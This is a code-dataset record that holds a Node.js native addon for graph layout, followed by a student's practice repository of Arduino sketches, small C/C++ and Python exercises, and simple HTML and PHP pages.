"text": "#include <node_api.h>\n#include <assert.h>\n#include <vector>\n#include <stdio.h>\n#include <iostream>\n\n#include \"layout.h\"\n\nnapi_value RunLayout(napi_env env, napi_callback_info info) {\n napi_status status;\n\n #pragma region validateInput\n\n size_t argc = 3;\n napi_value args[3];\n status = napi_get_cb_info(env, info, &argc, args, nullptr, nullptr);\n assert(status == napi_ok);\n\n if (argc < 3) {\n napi_throw_type_error(env, nullptr, \"Wrong number of arguments\");\n return nullptr;\n }\n\n napi_valuetype valuetype0;\n status = napi_typeof(env, args[0], &valuetype0);\n assert(status == napi_ok);\n\n napi_valuetype valuetype1;\n status = napi_typeof(env, args[1], &valuetype1);\n assert(status == napi_ok);\n\n napi_valuetype valuetype2;\n status = napi_typeof(env, args[2], &valuetype2);\n assert(status == napi_ok);\n\n if (valuetype0 != napi_object || valuetype1 != napi_object || valuetype2 != napi_number) {\n napi_throw_type_error(env, nullptr, \"Wrong arguments\");\n return nullptr;\n }\n\n bool istypedarray0;\n status = napi_is_typedarray(env, args[0], &istypedarray0);\n assert(status == napi_ok);\n\n bool istypedarray1;\n status = napi_is_typedarray(env, args[1], &istypedarray1);\n assert(status == napi_ok);\n\n if(!istypedarray0 || !istypedarray1) {\n napi_throw_type_error(env, nullptr, \"Both arguments must be int32array\");\n return nullptr;\n }\n\n napi_typedarray_type nodesTaType;\n size_t nodesLength;\n void* nodesDataRaw;\n size_t nodesOffset;\n napi_value nodesArraybuffer;\n status = napi_get_typedarray_info(env, args[0], &nodesTaType, &nodesLength, &nodesDataRaw, &nodesArraybuffer, &nodesOffset);\n assert(status == napi_ok);\n\n napi_typedarray_type edgesTaType;\n size_t edgesLength;\n void* edgesDataRaw;\n size_t edgesOffset;\n napi_value edgesArraybuffer;\n status = napi_get_typedarray_info(env, args[1], &edgesTaType, &edgesLength, &edgesDataRaw, &edgesArraybuffer, &edgesOffset);\n assert(status == napi_ok);\n\n if(nodesTaType != napi_int32_array || edgesTaType != napi_int32_array) {\n napi_throw_type_error(env, nullptr, \"Both arguments must be int32array\");\n return nullptr;\n }\n\n int iterations;\n status = napi_get_value_int32(env, args[2], &iterations);\n assert(status == napi_ok);\n\n #pragma endregion validate input\n\n int32_t* nodesData = static_cast<int32_t*>(nodesDataRaw);\n int32_t* edgesData = static_cast<int32_t*>(edgesDataRaw);\n\n Layout graphLayout;\n graphLayout.init(nodesData, nodesLength, edgesData, edgesLength);\n\n for (int i = 0; i < iterations; ++i) {\n bool done = graphLayout.step();\n if (done) {\n break;\n }\n }\n\n napi_value result_array_buffer;\n void* result_data;\n status = napi_create_arraybuffer(env, nodesLength * sizeof(int32_t) * 3, &result_data, &result_array_buffer);\n assert(status == napi_ok);\n \n int32_t* resultValues = static_cast<int32_t*>(result_data);\n\n std::vector<Body>* bodies = graphLayout.getBodies();\n\n for(int i=0; i<nodesLength; i+=1) {\n resultValues[i*3] = nodesData[i];\n resultValues[(i*3) + 1] = (int)std::round((*bodies)[i].pos.x);\n resultValues[(i*3) + 2] = (int)std::round((*bodies)[i].pos.y);\n }\n\n #pragma region createOutput\n\n \n napi_value result;\n status = napi_create_typedarray(env, napi_int32_array, nodesLength * 3, result_array_buffer, nodesOffset, &result);\n assert(status == napi_ok);\n\n #pragma endregion createOutput\n\n return result;\n}\n\n#define DECLARE_NAPI_METHOD(name, func) \\\n { name, 0, func, 0, 0, 0, napi_default, 0 }\n\nnapi_value Init(napi_env env, napi_value exports) {\n napi_status status;\n napi_property_descriptor addDescriptor = DECLARE_NAPI_METHOD(\"runLayout\", RunLayout);\n status = napi_define_properties(env, exports, 1, &addDescriptor);\n assert(status == napi_ok);\n return exports;\n}\n\nNAPI_MODULE(addon, Init)\n"
}
] | 6 |
rubal501/practicas
|
https://github.com/rubal501/practicas
|
fb05b339b5aa59c449d37884e015551937ac6d4e
|
7ef0bc9dd075e6aabcc81be25bca7471d778d408
|
df380e5052fded3ad9e67a8d95bf20bd9454c1e4
|
refs/heads/master
| 2021-01-12T13:51:30.841227 | 2017-10-08T03:26:19 | 2017-10-08T03:26:19 | 69,195,686 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5028409361839294,
"alphanum_fraction": 0.5681818127632141,
"avg_line_length": 15,
"blob_id": "4210d6958fdf2a3bb097eca5628fee6e5bdc5dbe",
"content_id": "16d3a513d622cb47c56ff2f1d659a9d6a82ff77d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 352,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 22,
"path": "/Astronomia/Brazo mecanico/umbralmotor/umbralmotor.ino",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "#define umbral 30\n\nint pin1 = 6;\nint pin2 = 5;\nvoid setup() {\n // put your setup code here, to run once:\n pinMode(pin1, OUTPUT);\n pinMode(pin2, OUTPUT);\n Serial.begin(9600); \n}\n\nvoid loop() {\n int sp;\n for (sp=50; sp<256; sp++)\n {\n Serial.println(sp);\n \n analogWrite(pin1, 0);\n analogWrite(pin2, sp);\n delay(500); \n }\n}\n"
},
{
"alpha_fraction": 0.6788079738616943,
"alphanum_fraction": 0.695364236831665,
"avg_line_length": 32.55555725097656,
"blob_id": "f816799697e1f37db3914410f7a47a4c356f40f4",
"content_id": "7c8e445ab1fe3a7b278d6a218794b2e29ad1ca38",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 302,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 9,
"path": "/Arduino/pruebaArduino.py",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "import serial\nser=serial.Serial('/dev/ttyACM0', 9600)\nprint \"Dame un caracter ('r' para rojo, 'a' para amarillo, 'v' para verde y 's' para salir): \"\nentrada = raw_input()\nwhile entrada != 's':\n\tser.write(entrada)\n\tprint \"he enviado un\", entrada\n\tprint \"introduce otro caracter\"\n\tentrada = raw_input()\n"
},
{
"alpha_fraction": 0.5416953563690186,
"alphanum_fraction": 0.5596140623092651,
"avg_line_length": 24.017240524291992,
"blob_id": "dea2db23ff7d7168e54463f7063632292520344f",
"content_id": "e18854b8206642af15b0ce56a0d5901a6d675721",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1451,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 58,
"path": "/PaginaETE/PaginaPersona/Pagina.html",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n<html>\n <head>\n <meta charset=\"utf-8\">\n <title>Pagina de Agruras</title>\n <link rel=\"stylesheet\" href=\"StylePagina.css\" media=\"screen\" title=\"no title\">\n </head>\n <body>\n <table>\n <tr>\n <td>\n <div id=\"encabezado\">\n <pre>\n Mi nombre es:\n Roberto alias \"el rubal\"\n </pre>\n </div>\n </td>\n <td>\n <img src=\"Bof.JPG\" alt=\"imagen se pone aqui\" height=\"249\" width=\"187\" />\n </td>\n </tr>\n </table>\n\n<pre>\n Resido atualmente en la cdmx\n me gustaria vivir en Canada\n Me gusta ir a Hipsterizarme a la cineteca y\n conocer restaurantes nuevos\n en los ratos libres me gusta leer.\n <a href=\"https://play.spotify.com/user/legacyrecordings/playlist/4IHvnoQpvHc1FUHEKqPOXK\" target=\"_blank\">mi musica favorita</a>\n</pre>\n<table>\n <th>\n Contacto\n </th>\n <tr>\n <td>\n <a href=\"https://github.com/rubal501/practicas\" target=\"_blank\"><img src=\"Git.png\" alt=\"\" height=\"50\" width=\"50\" /></a>\n <a href=\"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" target=\"_blank\"><img src=\"Face.png\" alt=\"\" height=\"50\" width=\"50\" /></a>\n <a href=\"#\"><img src=\"Twitt.png\" alt=\"\" height=\"50\" width=\"50\" /></a>\n </td>\n\n\n </tr>\n</table>\n<ul>\n <div id=\"encabezadolinks\">\n <p>\n sitios relevantes\n </p>\n </div>\n <li><a href=\"#\">receta</a></li>\n <li><a href=\"#\">practica tablas</a></li>\n\n</ul>\n </body>\n</html>\n"
},
{
"alpha_fraction": 0.49838635325431824,
"alphanum_fraction": 0.5223605632781982,
"avg_line_length": 27.539474487304688,
"blob_id": "1dcd8570f18fea378dd8fb00492a17448d4a6080",
"content_id": "30d59231a2f047d123d76f937bca0d01c2d9c634",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2169,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 76,
"path": "/Cosas en c/mate.cpp",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <conio.h>\n#include <math.h>\n#include <stdlib.h>\nusing namespace std;\nfloat buscarDistancia(double x1, double x2, double y1, double y2){\n double cuad = 2;\n float distancia=sqrt(pow(x1-x2,cuad)+pow(y1-y2,cuad));\n return distancia;\n }\nfloat buscarPuntoMediox(float x1, float x2){\n float puntoMediox= (x2+x1)/2;\n return puntoMediox;\n }\nfloat buscarPuntoMedioy(float y1, float y2){\n float puntoMedioy= (y2+y1)/2;\n return puntoMedioy;\n }\nfloat buscarPendiente(float x1, float x2, float y1, float y2){\n float pendiente=(y2-y1)/(x2-x1);\n return pendiente;\n }\nint main()\n{\n\t/* code */\n\tchar opcion;\n\tdouble x1,x2,y1,y2;\n\tcout<<\"------------------------------------------------------------------------------\"<<endl\n\t<<\"////////////////////////////////////////////////////////////////////////////////\"<<endl;\n\tinicio:\n\tcout<<\"bienvenido usuario que opercion quiere realizar\"<<endl<<\"presione la ocion que dese:\"<<endl<<\"(a) obtener la distanciaentre dos punto\"<<endl\n <<\"(b) obtener punto medio entre dos puntos\"<<endl\n <<\"(c) obtener pendiente entre dos puntos\"<<endl\n <<\"(q) para salir\"<<endl\n <<\"////////////////////////////////////////////////////////////////////////////////\"<<endl\n <<\"------------------------------------------------------------------------------\"<<endl;\n\tcin>>opcion;\n\tcout<<\"Dame la primera x\"<<endl;\n\tcin>>x1;\n\tcout<<\"Dame la primera y\"<<endl;\n\tcin>>y1;\n\tcout<<\"Dame la segunda x\"<<endl;\n\tcin>>x2;\n\tcout<<\"Dame la segunda y\"<<endl;\n\tcin>>y2;\n\tif(opcion == 'a'){\n\t\tcout<<\"la distancia es igual a:\"<<buscarDistancia(x1,x2,y1,y2)<<endl;\n\t}\n\tif (opcion == 'b')\n\t{\n\t\tif (x1 == x2 || y1 == y2)\n\t\t{\n\t\t\tcout<<\"NO ES UN SEGMENTO\"<<endl;\n\t\t}\n\t\telse\n\t\t{ \n\t\tcout<<\"punto medio es igual a (\"<<buscarPuntoMediox(x1,x2)<<\",\"<<buscarPuntoMedioy(y1,y2)<<\")\"<<endl;\n\t\t}\n\t}\n\tif (opcion == 'c')\n\t{\n cout<<\"la pendiente entre los dos puntos: \"<<buscarPendiente(x1,x2,y1,y2) <<endl;\n\t}\n\tif (opcion == 'q')\n\t{\n\t\tsystem(\"cls\");\n\t\tcout<<\"adios\"<<endl;\n\t}\n\telse{\n\t\tsystem(\"cls\");\n\t\tcout<< \"inserte una opcion valida\"<<endl;\n\t\tgoto inicio;\n\t}\n\tgetch();\n\treturn 0;\n}\n"
},
{
"alpha_fraction": 0.6180257797241211,
"alphanum_fraction": 0.6638054251670837,
"avg_line_length": 28.723403930664062,
"blob_id": "82334fc441939d65534543448b747eaf78ad98a0",
"content_id": "cd63ec8ea8c693eca1c02b46e00651a0f2ca989e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1398,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 47,
"path": "/Arduino/ArduinoConsesor.ino",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "\nint sensor = A0;int lectura;int ledr=10;int leda=11;int ledv=12;\n\n// the setup routine runs once when you press reset:\nvoid setup() {\n // initialize the digital pin as an output\n Serial.begin(9600);pinMode(ledr, OUTPUT);pinMode(leda, OUTPUT);pinMode(ledv, OUTPUT);\n}\n\n\n// the loop routine runs over and over again forever:\nvoid loop() \n{\n lectura = analogRead(sensor);\n Serial.println(lectura);\n delay(500);\n if(lectura >= 500){\n digitalWrite(leda, HIGH);\n delay(300);\n digitalWrite(leda, LOW);\n delay(300);\n }\n else{\n digitalWrite(ledr, HIGH); // turn the LED on (HIGH is the voltage level // wait for a second\n delay (9000);\n digitalWrite(ledr, LOW); // turn the LED off by making the voltage LOW\n delay(1000);\n digitalWrite(leda, HIGH);\n delay (1000);\n digitalWrite(leda, LOW); // turn the LED off by making the voltage LOW\n delay(500);\n digitalWrite(leda, HIGH);\n delay (1000);\n digitalWrite(leda, LOW); // turn the LED off by making the voltage LOW\n delay(500);\n digitalWrite(leda, HIGH);\n delay (1000);\n digitalWrite(leda, LOW); // turn the LED off by making the voltage LOW\n delay(500);// wait for a second\n digitalWrite(ledv, HIGH);\n delay (9000);\n digitalWrite(ledv, LOW); // turn the LED off by making the voltage LOW\n delay(1000);\n digitalWrite(ledr, HIGH); // \n delay(4000);\n digitalWrite(ledr, LOW);\n }\n}\n"
},
{
"alpha_fraction": 0.6138364672660828,
"alphanum_fraction": 0.6675052642822266,
"avg_line_length": 22.15534019470215,
"blob_id": "04118a860f023a17e5c736786629766b2c93d43d",
"content_id": "d4bf3ef832d00477dc55eb9a2ec381c54b8a27e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2385,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 103,
"path": "/CarroBluethoth/CarroBluethoth.ino",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "#include <SoftwareSerial.h>\n#define motor1 3\n#define motor2 6\n#define M1dir1 4//motor1 con direccion 1\n#define M1dir2 5//motor1 con direccion 2 \n#define M2dir1 7//motor2 con direccion 1\n#define M2dir2 8//motor2 con direccion 2\n/*ojo la direccion 1 es hacia adelante, mientras que la\n direccion dos va hacia atras*/\nSoftwareSerial BT(9, 10);//el puto rx y tx va al revez pelotudo\nchar dato;\nvoid setup() {\n // put your setup code here, to run once:++++\n pinMode(motor1, OUTPUT);\n pinMode(motor2, OUTPUT);\n pinMode(M1dir1, OUTPUT);\n pinMode(M1dir2, OUTPUT);\n pinMode(M2dir1, OUTPUT);\n pinMode(M2dir2, OUTPUT);\n //se inicializa cada uno de los puertos\n BT.begin(9600);\n Serial.begin(9600);\n}\nvoid MoverHaciaAdelante(void) {\n digitalWrite(M1dir2, LOW);\n digitalWrite(M1dir1, HIGH);\n digitalWrite(M2dir2, LOW);\n digitalWrite(M2dir1, HIGH);\n delay(1000);\n}\nvoid Frenar (void) {\n digitalWrite(motor1, LOW);\n digitalWrite(motor2, LOW);\n}\nvoid MoverHaciaAtras(void) {\n digitalWrite(motor1, LOW);\n digitalWrite(motor2, LOW);\n //delay(100);\n digitalWrite(M1dir2, HIGH);\n digitalWrite(M1dir1, LOW);\n digitalWrite(M2dir2, HIGH);\n digitalWrite(M2dir1, LOW);\n digitalWrite(motor1, HIGH);\n digitalWrite(motor2, HIGH);\n delay(1000);\n\n}\nvoid MoverHaciaIzquierda(void) {\n digitalWrite(motor1, LOW);\n digitalWrite(motor2, LOW);\n //delay(100);\n digitalWrite(M1dir2, HIGH);\n digitalWrite(M1dir1, LOW);\n digitalWrite(M2dir2, HIGH);\n digitalWrite(M2dir1, HIGH);\n analogWrite(motor1, 150);\n digitalWrite(motor2, HIGH);\n delay(1000);\n\n}\nvoid MoverHaciaDerecha(void) {\n digitalWrite(motor1, LOW);\n digitalWrite(motor2, LOW);\n //delay(100);\n digitalWrite(M1dir2, HIGH);\n digitalWrite(M1dir1, LOW);\n digitalWrite(M2dir2, HIGH);\n digitalWrite(M2dir1, HIGH);\n analogWrite(motor2, 150);\n digitalWrite(motor1, HIGH);\n delay(1000);\n\n}\n\n\nvoid loop() {\n if (BT.available() > 0) //revisa si se recibe datos\n {\n dato = BT.read();\n Serial.println(dato);\n if (dato == 'a') {\n digitalWrite(motor1, HIGH);\n digitalWrite(motor2, HIGH);\n MoverHaciaAdelante();\n }\n if (dato == 'r') {\n MoverHaciaDerecha();\n }\n if (dato == 'l') {\n MoverHaciaIzquierda();\n }\n if (dato == 'b') {\n digitalWrite(motor1, HIGH);\n digitalWrite(motor2, HIGH);\n MoverHaciaAtras();\n }\n if (dato == 'f') {\n Frenar();\n }\n\n }\n\n}\n"
},
{
"alpha_fraction": 0.5857418179512024,
"alphanum_fraction": 0.6146435737609863,
"avg_line_length": 19.520000457763672,
"blob_id": "8e74095a185d8d28ed7e72ee44a5778e0a855511",
"content_id": "d91e586fee59f69dbf4ca34ffd361103080a5a32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 519,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 25,
"path": "/pruebaPotenciometro/pruebaPotenciometro.ino",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "int A,B;\nint pin1 = 6;\nint pin2 = 7;\nvoid setup()\n{\n Serial.begin(9600);\n pinMode(pin1, OUTPUT);\n pinMode(pin2, OUTPUT);\n}\n \nvoid loop(){\n int poten = digitalRead(A0);\n Serial.print(\"dame el objetivo\");\n int objetivo = Serial.read();\n int e = objetivo - poten;\n if(e>0){\n //no tengo idea de que poner\n //se me ocurre poner un analog write que tenga el valor de A y B\n //pero como no tengo el motor no me la quiero jugar\n analogWrite(pin1, e);\n }\n if(e<0){\n analogWrite(pin2, e);\n }\n}\n\n \n"
},
{
"alpha_fraction": 0.8199999928474426,
"alphanum_fraction": 0.8199999928474426,
"avg_line_length": 32.33333206176758,
"blob_id": "b5a85bb85892e8f1f4453c38bb39f67f9fc192c0",
"content_id": "2c8f38a0b488c9536e64bd0af9865dc5c197bb52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 100,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 3,
"path": "/PaginaETE/ProyectosHtml/README.md",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "# practicas\nEste es un repositorio donde guardo mis practicas.\ntodo esto puede ser usado libremente\n"
},
{
"alpha_fraction": 0.6111111044883728,
"alphanum_fraction": 0.6296296119689941,
"avg_line_length": 21.14285659790039,
"blob_id": "304e1d98e889b1dfcc29ad8ffb12a086a0a7a538",
"content_id": "d6c8150809967abcde0df324b8b58ea4662f3454",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 162,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 7,
"path": "/PaginaETE/ProyectosHtml/receta/RemEx.py",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "import math\ndef square_or_square_root(arr):\n for inte in arr:\n \tarr[inte] = math.sqrt(inte)\n return arr\na = [4,25]\nprint square_or_square_root(a) \n \t "
},
{
"alpha_fraction": 0.5978260636329651,
"alphanum_fraction": 0.5978260636329651,
"avg_line_length": 52.400001525878906,
"blob_id": "51288910cbd23cbf20e01ad6f00bfd96daf6701b",
"content_id": "2b590b2eabee383fc367c30de1d1c57fd41d3eea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 276,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 5,
"path": "/PaginaETE/Examen/Exa.php",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "\r\n\r\nSu nombre es: <?php echo htmlspecialchars($_POST['nom']); ?> .<br>\r\nSu numero de cuenta: <?php echo $_POST['num']; ?>.<br>\r\nSu grupo: <?php echo $_POST['grupo']; ?>.<br>\r\n<?php echo \"Sus respuestas fueron capturadas\"; ?><br>\r\n<?php echo \"Que la fuerza te acompane\"; ?>\r\n"
},
{
"alpha_fraction": 0.5576323866844177,
"alphanum_fraction": 0.6074766516685486,
"avg_line_length": 14.800000190734863,
"blob_id": "5b34d90175941df8ede0d2ea43d85b2025ed6782",
"content_id": "8b76fba571d6409b89ee45dd7991446994aebd22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 321,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 20,
"path": "/fadz.c",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "#include<SoftwareSerial.h>\nSoftwareSerial BT(10,11);\nint led = 13; \nint data;\n \nvoid setup()\n{\n BT.begin(9600);\n pinMode(led, OUTPUT); //establecemos 13 como salida\n Serial.begin(9600); //iniciando Serial\n}\n \nvoid loop(){\n if(BT.available()){\n data = BT.read();\n Serial.println(data);\n \n }\n \n }\n\n "
},
{
"alpha_fraction": 0.5843495726585388,
"alphanum_fraction": 0.6341463327407837,
"avg_line_length": 20.39130401611328,
"blob_id": "9e7d931a009bffb21dae6859114e9d00b109bdbc",
"content_id": "e6753f9f7ba67662ebfd942df3903c2040f40e96",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 984,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 46,
"path": "/Astronomia/Brazo mecanico/Fer/Fer.ino",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "#define umbral 70\n#define precision 10\nint angulo1, angulo2, diferencia, B, A;\nint pin1 = 6;\nint pin2 = 5;\nint pinEntrada = A0;\nvoid setup() {\n // put your setup code here, to run once:\n pinMode(pin1, OUTPUT);\n pinMode(pin2, OUTPUT);\n pinMode(pinEntrada, INPUT);\n pinMode(A1, INPUT);\n Serial.begin(9600);\n //map(angulo1,0,1024,0,100);\n}\n\nvoid loop() {\n // put your main code here, to run repeatedly:\n angulo1 = analogRead(pinEntrada);\n\n //falta una manera para que interactue con el usuario\n angulo2 = analogRead(A1);\n diferencia = angulo2 - angulo1;\n Serial.print(angulo1);\n Serial.print(\" \");\n Serial.println(angulo2);\n if (abs(diferencia) < precision)\n {\n analogWrite(pin1, 0);\n analogWrite(pin2, 0);\n }\n else\n {\n if (diferencia > 0)\n {\n analogWrite(pin2, 0);\n analogWrite(pin1, diferencia + umbral);\n }\n if (diferencia < 0)\n {\n analogWrite(pin1, 0);\n analogWrite(pin2, -diferencia + umbral);\n }\n }\n delay(10);\n}\n"
},
{
"alpha_fraction": 0.5950226187705994,
"alphanum_fraction": 0.610859751701355,
"avg_line_length": 15.370369911193848,
"blob_id": "d38366e2c9fd7faf391cf6964391c269beb0847f",
"content_id": "127ce48ea19f1f704660469903e84fb341a5402a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 442,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 27,
"path": "/escritor.c",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "#include <string.h>\n#include <stdio.h>\n#include <conio.h>\n#include <string>\nint main()\n{\n\t/* code */\n\tstd:string nommbre;\n char nombre[10];\n\tprintf(\"Dame el nombre del archivo que quieres crear\\n\");\n\tscanf(nombre);\n\t\n FILE *arch;\n\tchar linea[30], fin[5]=\"\";\n\tarch = fopen(,\"w\");\n\t\n\tdo\n\t{\n\t\tprintf(\"palabra:\");\n\t\tgets(linea);\n\t\tfputs(\"\\n\",arch);\n\t\tfputs(linea,arch);\n\t}while(strcmp(linea,fin)!=0);\n\tfclose(arch);\n\tgetch();\n\treturn 0;\n}\n"
},
{
"alpha_fraction": 0.6153846383094788,
"alphanum_fraction": 0.6524725556373596,
"avg_line_length": 20.264705657958984,
"blob_id": "722c24230dceeba5498cfcc866fd585105c4672f",
"content_id": "9d7d9a8809c8b23bc9223d25c9e30cf5120af4d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 728,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 34,
"path": "/Arduino/sesor.c",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "int Sensor = A0;\nint Rojo = 10;\nint Amarillo = 9;\nint Verde = 8;\nint Lectura;\nvoid setup() {\n // put your setup code here, to run once:\npinMode(Sensor, INPUT);\nSerial.begin(9600);\npinMode(Rojo, OUTPUT);\npinMode(Amarillo, OUTPUT);\npinMode(Verde, OUTPUT);\n\n}\n\nvoid loop() {\n // put your main code here, to run repeatedly:\n Lectura = analogRead(Sensor);\n Serial.print(\"analog.Read = \");\n Serial.println(Lectura);\n if(Lectura >= 400 && Lectura <500 ){\n digitalWrite(Verde, HIGH);\n }\n if(Lectura >= 500 && Lectura <600 ){\n digitalWrite(Amarillo, HIGH);\n }\n if(Lectura > 600){\n digitalWrite(Rojo, HIGH);\n }\n delay(300);\n digitalWrite(Verde, LOW);\n digitalWrite(Amarillo, LOW);\n digitalWrite(Rojo, LOW);\n}\n \n"
},
{
"alpha_fraction": 0.572877049446106,
"alphanum_fraction": 0.6210392713546753,
"avg_line_length": 20.324323654174805,
"blob_id": "002ec77c447d245913011b0ebee6b9d6ebe74dd5",
"content_id": "b222e072e18ccddcb3f131b8eedcfc145f5eb007",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 789,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 37,
"path": "/Astronomia/Brazo mecanico/sketch_jan25a/sketch_jan25a.ino",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "int angulo1, angulo2, diferencia, B, A;\nint pin1 = 6;\nint pin2 = 5;\nint pinEntrada = A0;\nvoid setup() {\n // put your setup code here, to run once:\n pinMode(pin1, OUTPUT);\n pinMode(pin2, OUTPUT);\n pinMode(pinEntrada, INPUT);\n pinMode(A1, INPUT);\n Serial.begin(9600); \n //map(angulo1,0,1024,0,100);\n}\n\nvoid loop() {\n // put your main code here, to run repeatedly:\n angulo1 = analogRead(pinEntrada);\n //falta una manera para que interactue con el usuario\n angulo2 = analogRead(A1);\n diferencia = angulo2 - angulo1;\n if (diferencia > 0)\n {\n \n analogWrite(pin2, 0);\n analogWrite(pin1, diferencia);\n }\n if (diferencia < 0)\n {\n analogWrite(pin1, 0);\n analogWrite(pin2, diferencia);\n }\n if (diferencia == 0)\n {\n //no se hace nada\n } \n\n}\n"
},
{
"alpha_fraction": 0.5006693601608276,
"alphanum_fraction": 0.5261043906211853,
"avg_line_length": 13.365385055541992,
"blob_id": "a77ad3b066c00a4724dd808fe42516f561225e5c",
"content_id": "2944648963816d4211400c88c8b5cee005bc65bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 750,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 52,
"path": "/Cosas en c/noMuyUtil.cpp",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <string>\n#include <conio.h>\n#include <windows.h>\nusing namespace std;\nint main(void)\n{\n\t/* code */\n\tchar pwd[30], usr[30];\n\tint i, cont;\n\tstrcpy(pwd, \"hola\");\n\tdo\n\t{\n printf(\"\\nintroduce la contraseña \\xA4\\aa:\\n\");\n\ti = 0;\n\tcont ++;\n\tdo\n\t{\n\t\tusr[i] = getch();\n\t\tif(usr[i]!=13 && usr[i]!=8)\n\t\t{\n\t\t\tprintf(\"*\");\n\t\t\ti++;\n\t\t}\n\t\tif (usr[i]==8 && i >=1)\n\t\t{\n\t\t\tusr[i]= ' ';\n printf( \"\\b \\b\");\n\t\t\ti--;\n\t\t}\n\t}\n\twhile(usr[i]!=13);\n\tusr[i] = '\\0';\n\tif (strcmp(usr,pwd)==0)\n\t{\n\t\tprintf(\"\\nconstraseñao\");\n\t}\n\telse\n\t{\n\t\tprintf(\"\\ncontraseña incorrecta\");\n\t}\n}while(strcmp(usr,pwd)!=0||cont==3);\nif (strcmp(usr,pwd)==0){\nprintf(\"bievenido\");\n}\nelse\n{\n printf(\"cuenta bloqueada\");\n }\ngetch();\n\treturn 0;\n}\n"
},
{
"alpha_fraction": 0.4606741666793823,
"alphanum_fraction": 0.49578651785850525,
"avg_line_length": 16.774999618530273,
"blob_id": "ae62bafba8143efcba5577b36a780ef1e68c3f3b",
"content_id": "83531b729142911f003bd81eb424d8b4d66d4555",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 712,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 40,
"path": "/yoptot.c",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "#include <conio.h>\n#include <stdio.h>\n#include <string.h>\nint main(void)\n{\n //esta Version es para solo 10 digitos\n char lista[20][10];\n int bandera;\n char aux[20];\n for (int i = 0; i < 10; ++i)\n {\n printf(\"dame una palabra: \");\n gets(lista[i]);\n }\n //esta parte se encarga de ordenar los numeros\n bandera = 1;\n while (bandera == 1) {\n bandera = 0;\n for (int g = 0; g < 8; ++g)\n {\n if (strcmp(lista[g], lista[g + 1]) > 0)\n {\n strcpy(aux, lista[g]);\n strcpy(lista[g], lista[g + 1]);\n strcpy(lista[g + 1], aux);\n bandera = 1;\n }\n }\n\n }\n\n\n for (int d = 0; d < 10; ++d)\n {\n printf(\"\\n\");\n puts(lista[d]);\n }\n getch();\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.5493826866149902,
"alphanum_fraction": 0.5761317014694214,
"avg_line_length": 29.375,
"blob_id": "c1fa9a1f89ad857010b07932884eacd8f4134cc5",
"content_id": "2b4d2d5da0fe1a1366290a7eb6440cea5b137b4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 486,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 16,
"path": "/PaginaETE/ProyectosHtml/receta/intento.py",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
